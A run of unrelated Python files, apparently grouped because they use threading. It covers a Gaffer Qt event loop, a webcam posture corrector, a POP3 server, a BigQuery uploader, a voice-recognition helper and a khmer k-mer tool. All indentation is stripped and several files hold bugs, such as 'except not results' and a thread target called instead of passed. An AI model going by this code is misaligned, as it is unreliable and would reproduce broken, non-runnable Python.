self._maxtasksperchild = maxtasksperchild
def filter(self, items: Iterable[Any]) -> Iterable[Any]:
try:
with Manager() as manager:
stdlog = QueueIO(Queue())
stderr = CobaMultiprocessor.PipeStderr()
log_thread = Thread(target=Pipes.join(stdlog,Foreach(CobaContext.logger.sink)).run)
log_thread.daemon = True
log_thread.start()
logger = CobaContext.logger
cacher = ConcurrentCacher(CobaContext.cacher, manager.dict(), Lock(), Condition())
store = { "srcsema": Semaphore(2) }
filter = CobaMultiprocessor.ProcessFilter(self._filter, logger, cacher, store, stdlog)
for item in Multiprocessor(filter, self._processes, self._maxtasksperchild, stderr).filter(items):
yield item
stdlog.write(None) #attempt to shutdown the logging process gracefully by sending the poison pill
except RuntimeError as e: #pragma: no cover
#This happens when importing main causes this code to run again
coba_exit(str(e))
|
EventLoop.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import time
import weakref
import threading
import traceback
import functools
import six
import IECore
import Gaffer
import GafferUI
from Qt import QtCore
from Qt import QtWidgets
## This class provides the event loops used to run GafferUI based applications.
class EventLoop( object ) :
__RunStyle = IECore.Enum.create( "Normal", "PumpThread", "AlreadyRunning", "Houdini" )
## Creates a new EventLoop. Note that if you are creating the primary
# EventLoop for an application then you should use mainEventLoop() instead.
def __init__( self, __qtEventLoop=None ) :
if __qtEventLoop is None :
if self.__mainEventLoop is None or self.__mainEventLoop.__startCount==0 :
raise Exception( "Main event loop is not running - perhaps you should use EventLoop.mainEventLoop()?" )
self.__qtEventLoop = QtCore.QEventLoop()
else :
self.__qtEventLoop = __qtEventLoop
self.__runStyle = self.__RunStyle.Normal
if isinstance( self.__qtEventLoop, QtWidgets.QApplication ) :
try :
import maya.OpenMaya
if maya.OpenMaya.MGlobal.apiVersion() < 201100 :
self.__runStyle = self.__RunStyle.PumpThread
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import hou
if hou.applicationVersion()[0] < 14 :
self.__runStyle = self.__RunStyle.Houdini
else :
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
try :
import nuke
self.__runStyle = self.__RunStyle.AlreadyRunning
except ImportError :
pass
self.__startCount = 0
self.__pumpThread = None
self.__houdiniCallback = None
## Starts the event loop, passing control to the UI code. This function returns
# when the corresponding stop() method is called. See documentation for
# mainEventLoop() for exceptions to this rule.
def start( self ) :
self.__startCount += 1
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exec_()
elif self.__runStyle == self.__RunStyle.PumpThread :
if self.__pumpThread is None :
self.__pumpThread = threading.Thread( target = self.__pumpThreadFn )
self.__pumpThread.start()
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__houdiniCallback is None :
import hou
hou.ui.addEventLoopCallback( functools.partial( self.__pump, 5 ) )
self.__houdiniCallback = hou.ui.eventLoopCallbacks()[-1]
else :
# RunStyle.AlreadyRunning
# host application is using qt natively, no need to do anything.
pass
## Stops the event loop last started using start().
def stop( self ) :
assert( self.__startCount > 0 )
if self.__runStyle == self.__RunStyle.Normal :
assert( self.__startCount == 1 )
self.__qtEventLoop.exit()
elif self.__runStyle == self.__RunStyle.PumpThread :
## \todo Should we try to stop the pump thread
# when self.__startCount hits 0? Right not we're
# just keeping it running on the assumption we'll
# need it again soon.
pass
elif self.__runStyle == self.__RunStyle.Houdini :
if self.__startCount == 1 and self.__houdiniCallback :
import hou
hou.ui.removeEventLoopCallback( self.__houdiniCallback )
self.__houdiniCallback = None
else :
# RunStyle.AlreadyRunning
pass
self.__startCount -= 1
## Returns true if this event loop is currently running.
def running( self ) :
return self.__startCount > 0
# if we're running embedded in an application which already uses qt (like maya 2011 or later)
# then there'll already be an application, which we'll share. if not we'll make our own.
if QtWidgets.QApplication.instance() :
__qtApplication = QtWidgets.QApplication.instance()
else :
# Set the style explicitly so we don't inherit one from the desktop
# environment, which could mess with our own style (on GNOME for instance,
# our icons can come out the wrong size).
style = QtWidgets.QApplication.setStyle( "Fusion" )
# Stop icons/fonts being tiny on high-dpi monitors. Must be set before
# the application is created.
QtWidgets.QApplication.setAttribute( QtCore.Qt.AA_EnableHighDpiScaling )
assert( style is not None )
__qtApplication = QtWidgets.QApplication( [ "gaffer" ] )
# Fixes laggy interaction with tablets, equivalent to the old
# QT_COMPRESS_TABLET_EVENTS env var supported in Maya Qt builds.
__qtApplication.setAttribute( QtCore.Qt.AA_CompressTabletEvents, True )
__mainEventLoop = None
## Returns the main event loop for the application. This should always
# be started before running any other nested event loops. In the standalone
# Gaffer applications, the main event loop acts like any other, but when
# GafferUI is embedded in another application (like Maya) it behaves slightly
# differently. In this case, the start() method returns immediately so that
# the GafferUI event loop may be interleaved with the event loop of the host
# application. Additionally, the start() method may also be called multiple
# times to allow several GafferUI-based applications to run in the same host.
# The main event loop will therefore only cease running when the number of
# calls to stop() matches the number of calls to start().
@classmethod
def mainEventLoop( cls ) :
if cls.__mainEventLoop is None :
cls.__mainEventLoop = cls( cls.__qtApplication )
return cls.__mainEventLoop
__idleCallbacks = []
__idleTimer = None
## Adds a function to be called when the event loop is idle (has no events
# remaining to be processed). If callback returns False then it will be removed
# automatically after running, if it returns True it will be called again until
# it returns False, or until removeIdleCallback() is called.
## \todo This should probably be replaced with an idleSignal() like the one we
# have in GafferUI.Gadget.
@classmethod
def addIdleCallback( cls, callback ) :
assert( callback not in cls.__idleCallbacks )
cls.__idleCallbacks.append( callback )
cls.__ensureIdleTimer()
## Removes an idle callback previously created with addIdleCallback().
@classmethod
def removeIdleCallback( cls, callback ) :
cls.__idleCallbacks.remove( callback )
## Convenience method to introduce a delay on the mainEventLoop().
@classmethod
def waitForIdle( cls, count = 1000 ) :
cls.__idleCount = 0
def f() :
cls.__idleCount += 1
if cls.__idleCount >= count :
EventLoop.mainEventLoop().stop()
return False
return True
EventLoop.addIdleCallback( f )
EventLoop.mainEventLoop().start()
## Widgets may only be manipulated on the thread where mainEventLoop() is running. It
# is common to want to perform some background processing on a secondary thread, and
# to update the UI during processing or upon completion. This function can be used from
# such a secondary thread to queue a callable to be called on the main thread. If called
# from the main thread, the callable is called immediately.
@classmethod
def executeOnUIThread( cls, callable, waitForResult=False ) :
return _uiThreadExecutor.execute( callable, waitForResult )
## Context manager that blocks callables queued with `executeOnUIThread()`.
# The calls will be deferred until after the block exits. This is useful
# to defer graph edits that would cause unwanted cancellation of a
# BackgroundTask.
## \todo Blocking all UI thread execution is overkill. We could add a
# `subject` argument to `ParallelAlgo::callOnUIThread()`, mirroring the
# existing argument to `ParallelAlgo::callOnBackgroundThread()`. Then
# we could limit the blocking to calls with the relevant subject.
class BlockedUIThreadExecution( object ) :
def __enter__( self ) :
_uiThreadExecutor.blockExecution()
def __exit__( self, type, value, traceBack ) :
_uiThreadExecutor.unblockExecution()
@classmethod
def __ensureIdleTimer( cls ) :
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
if cls.__idleTimer is None :
cls.__idleTimer = QtCore.QTimer( cls.__qtApplication )
cls.__idleTimer.timeout.connect( cls.__qtIdleCallback )
if not cls.__idleTimer.isActive() :
cls.__idleTimer.start()
# This is a staticmethod rather than a classmethod because PySide 1.0.5
# doesn't support classmethods as slots.
@staticmethod
def __qtIdleCallback() :
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
GafferUI.Gadget.idleSignal()()
for c in EventLoop.__idleCallbacks[:] : # slice takes copy, so we can remove during iteration
try :
if not c() :
EventLoop.__idleCallbacks.remove( c )
except Exception as e :
# if the callback throws then we remove it anyway, because
# we don't want to keep invoking the same error over and over.
EventLoop.__idleCallbacks.remove( c )
# report the error
IECore.msg( IECore.Msg.Level.Error, "EventLoop.__qtIdleCallback", "".join( traceback.format_exc() ) )
if len( EventLoop.__idleCallbacks )==0 and GafferUI.Gadget.idleSignal().empty() :
EventLoop.__idleTimer.stop()
@classmethod
def _gadgetIdleSignalAccessed( cls ) :
# It would be an error to access the idle signal from anything but the main
# thread, because it would imply multiple threads fighting over the same signal.
assert( QtCore.QThread.currentThread() == EventLoop.__qtApplication.thread() )
cls.__ensureIdleTimer()
def __pumpThreadFn( self ) :
import maya.utils
while 1 :
time.sleep( 0.01 )
maya.utils.executeDeferred( self.__pump )
def __pump( self, thrusts=1 ) :
for thrust in range( 0, thrusts ) :
self.__qtEventLoop.processEvents()
GafferUI.Gadget._idleSignalAccessedSignal().connect( EventLoop._gadgetIdleSignalAccessed, scoped = False )
# Internal implementation for `EventLoop.executeOnUIThread()`. There are
# multiple ways of achieving this in Qt, but they all boil down to scheduling an
# event on the main loop. We have tried the following :
#
# - Creating a new QObject to wrap the callable, moving it to the main thread,
# and then using `postEvent()` to trigger a call to `customEvent()`, which
# executes the callable. This triggered GIL/refcount bugs in PySide which meant
# that the QObject was occasionally deleted prematurely.
# - Having a single QObject living on the main thread, with a signal which we
# emitted from the background thread to schedule execution. This was more reliable,
# but still triggered occasional PySide crashes.
# - Having a single QObject living on the main thread, and using `QMetaObject.invokeMethod()`
# to queue a call to one of its methods. This is the approach we currently use.
class _UIThreadExecutor( QtCore.QObject ) :
def __init__( self ) :
QtCore.QObject.__init__( self )
# In an ideal world, we'd pass the callables via arguments to
# `__executeInternal`. But I haven't figured out how to do that via
# `invokeMethod()` and doing the equivalent via signals crashes PySide.
# So instead we pass the callables via this queue and just use
# `invokeMethod()` to schedule their removal on the UI thread.
self.__queue = six.moves.queue.Queue()
self.__blockedCallables = None
def execute( self, callable, waitForResult ) :
if QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() :
# Already on the UI thread - just do it.
return callable()
resultCondition = threading.Condition() if waitForResult else None
if resultCondition is not None :
resultCondition.acquire()
self.__queue.put( ( callable, resultCondition ) )
QtCore.QMetaObject.invokeMethod( self, "__executeInternal", QtCore.Qt.ConnectionType.QueuedConnection )
if resultCondition is not None :
resultCondition.wait()
resultCondition.release()
return resultCondition.resultValue
def blockExecution( self ) :
assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )
# Set up a container to buffer into
assert( self.__blockedCallables is None )
self.__blockedCallables = []
def unblockExecution( self ) :
assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )
# Schedule each of the buffered calls again, and then clear the buffer.
# We don't just execute them immediately because it would be surprising
# to the user of `BlockedUIThreadExecution` to have arbitrary code be
# executed in the middle of their function.
assert( isinstance( self.__blockedCallables, list ) )
for callable, resultCondition in self.__blockedCallables :
self.__queue.put( ( callable, resultCondition ) )
QtCore.QMetaObject.invokeMethod( self, "__executeInternal", QtCore.Qt.ConnectionType.QueuedConnection )
self.__blockedCallables = None
@QtCore.Slot()
def __executeInternal( self ) :
assert( QtCore.QThread.currentThread() == QtWidgets.QApplication.instance().thread() )
callable, resultCondition = self.__queue.get()
if self.__blockedCallables is not None :
self.__blockedCallables.append( ( callable, resultCondition ) )
else :
result = callable()
if resultCondition is not None :
resultCondition.acquire()
resultCondition.resultValue = result
resultCondition.notify()
resultCondition.release()
_uiThreadExecutor = _UIThreadExecutor()
# Service the requests made to `ParallelAlgo::callOnUIThread()`.
Gaffer.ParallelAlgo.pushUIThreadCallHandler( EventLoop.executeOnUIThread )
|
app.py | import mediapipe as mp # package for pose detection
import cv2 # package for computer vision
import time # python time module
import threading # run multiple processes at the same time
from gtts import gTTS # google text-to-speech module
import os # importing os module
# importing self defined utility functions
from util import *
# configuring mediapipe functions
mp_drawing = mp.solutions.drawing_utils
mp_drawing_styles = mp.solutions.drawing_styles
mp_holistic = mp.solutions.holistic
# Processes Real time feed to analyse frames
def cam_feed(cap):
# Initiate holistic model
with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:
while cap.isOpened():
# handling errors
# if any errors is occured during the running of the program
# then it handles
try:
success, img = cap.read()
if not success:
print("Unable to load video.")
continue
img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)
# Recolor Feed
img.flags.writeable = False
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(img)
except not results:
continue
# Recolor image back to BGR for rendering
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
# Right Hand
mp_drawing.draw_landmarks(img, results.right_hand_landmarks, mp_holistic.HAND_CONNECTIONS)
# Left Hand
mp_drawing.draw_landmarks(img, results.left_hand_landmarks, mp_holistic.HAND_CONNECTIONS)
# Pose Detections
mp_drawing.draw_landmarks(img, results.pose_landmarks, mp_holistic.POSE_CONNECTIONS,
landmark_drawing_spec=mp_drawing_styles.get_default_pose_landmarks_style())
# Flip the image horizontally for a selfie-view display.
cv2.imshow('Real-time Webcam', cv2.flip(img, 1))
if cv2.waitKey(10) & 0xFF == ord('q'):
break
# Function to check Posture
def check(cap):
# Initiate holistic model
with mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5) as holistic:
while cap.isOpened():
# handling errors
# if any erros is occured during the running of the program
# then it handles
try:
success, img = cap.read()
if not success:
print("Unable to load video.")
continue
img = cv2.resize(img, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)
# Recolor Feed
img.flags.writeable = False
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Make Detections
results = holistic.process(img)
# Recolor image back to BGR for rendering
img.flags.writeable = True
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
# detecting landmarks
coord = detect_landmark(img, results, True)
except AttributeError:
continue
posture = correct_posture(coord)
if not posture:
text = build_message(coord)
speech = gTTS(text = text, lang = 'en', slow = False)
speech.save("text.mp3")
os.system("start text.mp3")
print(text)
# Flip the image horizontally for a selfie-view display.
cv2.imshow('Posture Corrector', cv2.flip(img, 1))
time.sleep(20)
if cv2.waitKey(10) & 0xFF == ord('q'):
break
def main():
# Getting Real-time Webcam feed
cap = cv2.VideoCapture(0)
# Thread to run multiple processes at the same time
t1 = threading.Thread(target=cam_feed, args=[cap])
t2 = threading.Thread(target=check, args=[cap])
# Thread starts
t1.start()
t2.start()
# Waits for both threads to end before releasing cap
t1.join()
t2.join()
# Destroys Video Capture object and closes the window
cap.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main() |
POP3SF.py | # SPDX-License-Identifier: BSD-3-Clause
#
# Copyright (c) 2021 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import Union, List
import gc
import socket
import select
import ssl
import threading
from .Settings import Settings
from .Auxiliaries import Auxiliaries
from .GlobalResources import GlobalResources
from .ClientHandler import ClientHandler
from .ClientConnectionInfoHolder import ClientConnectionInfoHolder
from .ServerSocketInfoHolder import ServerSocketInfoHolder
from .PerUserExclusivityEnsurer import PerUserExclusivityEnsurer
from .POP3SFRuntimeError import POP3SFRuntimeError
class POP3SF:
PROGRAM_VERSION: float = 1.0
_LISTEN_BACKLOG: int = 64
def __init__(self):
Auxiliaries.change_working_directory_and_umask()
GlobalResources.set_resources(Settings.get_logger(), PerUserExclusivityEnsurer())
self._threads: List[threading.Thread] = []
self._server_sockets: List[Union[socket.socket, ssl.SSLSocket]] = self._generate_server_sockets()
self._server_poll_object: select.poll = self._generate_poll_object_from_server_sockets()
Auxiliaries.drop_root_privileges_if_needed() # The root privileges are dropped after the server sockets have been created, as the sockets have already been bound, possibly to a privileged port.
self._continue_polling_for_new_connections: bool = True
self._next_connection_id: int = 1
def _generate_server_sockets(self) -> List[Union[socket.socket, ssl.SSLSocket]]:
server_sockets = []
for info_holder in Settings.LISTEN_ON:
server_sockets += self._generate_server_sockets_from_info_holder(info_holder)
if len(server_sockets) == 0:
raise POP3SFRuntimeError("The server couldn't create any listening server sockets!")
return server_sockets
def _generate_server_sockets_from_info_holder(self, info_holder: ServerSocketInfoHolder) -> List[Union[socket.socket, ssl.SSLSocket]]:
server_sockets = []
addrinfo_list = socket.getaddrinfo(info_holder.listen_address, info_holder.listen_port, proto=socket.IPPROTO_TCP)
for addrinfo in addrinfo_list:
socket_ = self._create_plain_tcp_server_socket(addrinfo)
if info_holder.use_tls:
socket_ = self._wrap_plain_tcp_server_socket_in_tls(socket_, info_holder.tls_certificate_file, info_holder.tls_private_key_file)
server_sockets.append(socket_)
return server_sockets
def _create_plain_tcp_server_socket(self, addrinfo: tuple) -> Union[socket.socket, ssl.SSLSocket]:
plain_tcp_socket = socket.socket(family=addrinfo[0], type=addrinfo[1], proto=addrinfo[2])
plain_tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if addrinfo[0] == socket.AF_INET6:
plain_tcp_socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1) # Disable dual-stack on IPv6 sockets
plain_tcp_socket.bind(addrinfo[4])
plain_tcp_socket.listen(POP3SF._LISTEN_BACKLOG)
return plain_tcp_socket
def _wrap_plain_tcp_server_socket_in_tls(self, plain_tcp_socket: Union[socket.socket, ssl.SSLSocket], certificate_file: str, private_key_file: str) -> Union[socket.socket, ssl.SSLSocket]:
tls_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
tls_context.load_cert_chain(certfile=certificate_file, keyfile=private_key_file)
return tls_context.wrap_socket(plain_tcp_socket, server_side=True)
def _generate_poll_object_from_server_sockets(self) -> select.poll:
poll_object = select.poll()
for server_socket in self._server_sockets:
poll_object.register(server_socket, select.POLLIN)
return poll_object
def start_server_loop(self) -> None:
self._send_on_start_log_messages()
while self._continue_polling_for_new_connections:
self._poll_server_sockets()
for server_socket in self._server_sockets:
server_socket.close()
self._send_on_exit_log_messages()
def _send_on_start_log_messages(self) -> None:
GlobalResources.get_logger().info("POP3SF successfully started.")
GlobalResources.get_logger().info("Listening on " + ", ".join(map(Auxiliaries.get_server_sockets_address_as_string, self._server_sockets)) + ".")
for server_socket in self._server_sockets:
if not isinstance(server_socket, ssl.SSLSocket):
GlobalResources.get_logger().warning("The server socket listening on {} is not secured with TLS! Personal information may get leaked!".format(Auxiliaries.get_server_sockets_address_as_string(server_socket)))
def _send_on_exit_log_messages(self) -> None:
GlobalResources.get_logger().info("The server is exiting.")
def _poll_server_sockets(self) -> None:
try:
poll_events = self._server_poll_object.poll()
except KeyboardInterrupt:
self._continue_polling_for_new_connections = False
return
for fd, events in poll_events:
if events & select.POLLIN:
server_socket = self._find_server_socket_by_polled_fd(fd)
self._accept_client_connection_on_a_server_socket(server_socket)
else:
raise POP3SFRuntimeError("Unexpected event(s) ({}) happened on server socket with FD {}!".format(events, fd))
def _find_server_socket_by_polled_fd(self, fd: int) -> Union[socket.socket, ssl.SSLSocket]:
for server_socket in self._server_sockets:
if fd == server_socket.fileno():
return server_socket
raise POP3SFRuntimeError("The poll() function returned an invalid file descriptor!")
def _accept_client_connection_on_a_server_socket(self, server_socket: Union[socket.socket, ssl.SSLSocket]) -> None:
try:
client_socket, client_addr = server_socket.accept()
except ssl.SSLError:
return
connection_info = ClientConnectionInfoHolder(self._next_connection_id, client_socket, client_addr)
self._start_per_client_thread(connection_info)
self._next_connection_id += 1
def _start_per_client_thread(self, connection_info: ClientConnectionInfoHolder) -> None:
if not self._check_if_another_client_can_be_connected():
try:
connection_info.socket.close()
except OSError:
pass
return
thread = threading.Thread(target=ClientHandler.initialize_client_handler, args=(connection_info,), daemon=True)
thread.start()
self._threads.append(thread)
def _check_if_another_client_can_be_connected(self) -> bool:
# For every connected client, a new thread is created.
# The concurrently connected client limit (= concurrently running thread limit) is defined in the Settings.py file.
self._threads = [thread for thread in self._threads if thread.is_alive()]
# Invoke the garbage collector manually to forcibly release any unnecessary memory associated with the died threads (disconnected clients) before connecting another client
gc.collect()
return len(self._threads) < Settings.MAX_CONCURRENT_CLIENTS
|
bq.py | #
# Licensed under the LICENSE.
# Copyright 2017, Sony Mobile Communications Inc.
#
'''
BigQuery uploads
'''
import base64
from threading import Thread
from os import environ
import requests
from utils.environment import TE
class BQ:
"""
Class implementing BigQuery uploads.
:class: BQ
"""
BASE_URL = 'https://.../{}/{}'
print(environ.get('TENSHI_WORKER_URL'))
def __init__(self):
"""
Constructor. Sets data set based on current environment.
"""
# self._data_set = 'test'
self._data_set = 'stage'
if TE.is_prod():
self._data_set = 'stage'
@staticmethod
def _wrap_data(data_str):
"""
Wraps data to be accepted by the worker
:param data_str: Data to send as a stringified JSON.
:return: The wrapped dictionary.
"""
return {
'message': {
'data': base64.b64encode(data_str.encode('utf-8')).decode('utf-8')
}
}
@staticmethod
def _post(url, data_str):
"""
Posts data to the worker.
:param url: URL to post data to.
:param data_str: The data to post as a stringified JSON.
"""
response = requests.post(url, json=BQ._wrap_data(data_str))
print(response.content)
@staticmethod
def _async_post(url, data_str):
"""
Posts data to the worker asynchronously.
:param url: URL to post data to.
:param data_str: The data to post as a stringified JSON.
:return:
"""
Thread(target=BQ._post(url, data_str)).start()
def pro(self, data_str):
"""
Sends data to the pick route optimization table in BQ.
:param data_str: Payload to send as a stringified JSON.
"""
print('Sending data to /pro')
BQ._async_post((BQ.BASE_URL.format(self._data_set, 'pickroute')), data_str)
def batching(self, data_str):
"""
Sends data to the batching table in BQ.
:param data_str: Payload to send as a stringified JSON.
:return:
"""
print('Sending data to /batching')
BQ._async_post(BQ.BASE_URL.format(self._data_set, 'singlebatch'), data_str)
# It's a singleton, of course :)
BQ = BQ()
|
VoiceRecognition.py | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import threading
import time
import playsound
import speech_recognition as sr
#from webdriver_manager.chrome import ChromeDriverManager
import os
class VoiceRecognition:
def __init__(self):
self.language = 'vi'
#self.path = ChromeDriverManager().install()
# self.source = sr.Microphone()
# print(self.source)
self.recognizer = sr.Recognizer()
self.text = []
self.audio_array = []
self.list_of_text = ['']
def setup_listening_queue(self):
self.listen_audio()
threading.Thread(target=self.thread_recognize).start()
def callback(self, recognizer, audio):
self.audio_array.append(audio)
def thread_recognize(self):
while True:
if self.audio_array:
for index, audio in enumerate(self.audio_array):
try:
text = self.recognizer.recognize_google(audio, language="vi-VN")
self.list_of_text.append(text.lower())
del (self.audio_array[index])
except:
del (self.audio_array[index])
def listen_audio(self):
self.recognizer.listen_in_background(sr.Microphone(), self.callback, 3)
def text_recognition(self):
text = None
start = time.time()
r = sr.Recognizer()
print("Step 1: ", time.time() - start)
with sr.Microphone() as source:
# self.recognizer.adjust_for_ambient_noise(source, 1)
print("Step 2: ", time.time() - start)
print("Tôi: ", end='')
audio = r.listen(source, phrase_time_limit=0.5)
print("Step 3: ", time.time() - start)
try:
text = r.recognize_google(audio, language="vi-VN")
print("Step 4: ", time.time() - start)
except:
print("...")
if text:
print("Step 5: ", time.time() - start)
return text.lower()
else:
return ""
def play_audio_file(self, file):
print(os.path.abspath("voice/anh_can_em_giup_gi_a.mp"))
playsound.playsound(os.path.abspath(""+file))
if __name__ == "__main__":
voice = VoiceRecognition()
voice.play_audio_file("asd")
# voice.setup_listening_queue()
# while True:
# text = voice.list_of_text[-1]
# print("ok")
# print(text)
|
optimal_args_hashbits.py | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=invalid-name,missing-docstring
"""
Estimate optimal arguments using nodegraph counting.
% python sandbox/optimal_args_nodegraph.py <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
from __future__ import print_function
import sys
import math
import threading
import khmer
from khmer.khmer_args import (report_on_config, info, add_threading_args,
build_nodegraph_args)
from khmer.kfile import check_input_files, check_space
from khmer.kfile import check_space
from khmer.khmer_args import graphsize_args_report
def get_parser():
parser = build_nodegraph_args(descr="Load sequences into the compressible "
"graph format plus optional tagset.")
add_threading_args(parser)
parser.add_argument('input_filenames', metavar='input_sequence_filename',
nargs='+', help='input FAST[AQ] sequence filename')
return parser
def main():
info('optimal_args_nodegraph.py', ['graph', 'SeqAn'])
args = get_parser().parse_args()
report_on_config(args, graphtype='nodegraph')
filenames = args.input_filenames
base = filenames[0]
for _ in args.input_filenames:
check_input_files(_, False)
check_space(args.input_filenames, False)
print('Counting kmers from sequences in %s' % repr(filenames),
file=sys.stderr)
htable = khmer.new_nodegraph(args.ksize, args.max_tablesize, args.n_tables)
target_method = htable.consume_seqfile_with_reads_parser
for _, filename in enumerate(filenames):
rparser = khmer.ReadParser(filename)
threads = []
print('consuming input', filename, file=sys.stderr)
for num in xrange(args.threads):
cur_thread = threading.Thread(
target=target_method, args=(rparser,))
threads.append(cur_thread)
cur_thread.start()
for thread in threads:
thread.join()
unique_kmers = htable.n_unique_kmers()
print('Total number of unique k-mers: {0}'.format(unique_kmers),
file=sys.stderr)
info_optimal = open(base + '.optimal_args', 'w')
fp_rate = khmer.calc_expected_collisions(htable)
print('fp rate estimated to be %1.3f' % fp_rate, file=sys.stderr)
if fp_rate > 0.15: # 0.18 is ACTUAL MAX. Do not change.
print("**", file=sys.stderr)
print("** ERROR: the graph structure is too small for this data set."
"Increase table size/# tables.", file=sys.stderr)
print("**", file=sys.stderr)
if not False:
sys.exit(1)
to_print = graphsize_args_report(unique_kmers, fp_rate)
print(to_print, file=info_optimal)
print('optimal arguments were written to', base + '.optimal_args',
file=sys.stderr)
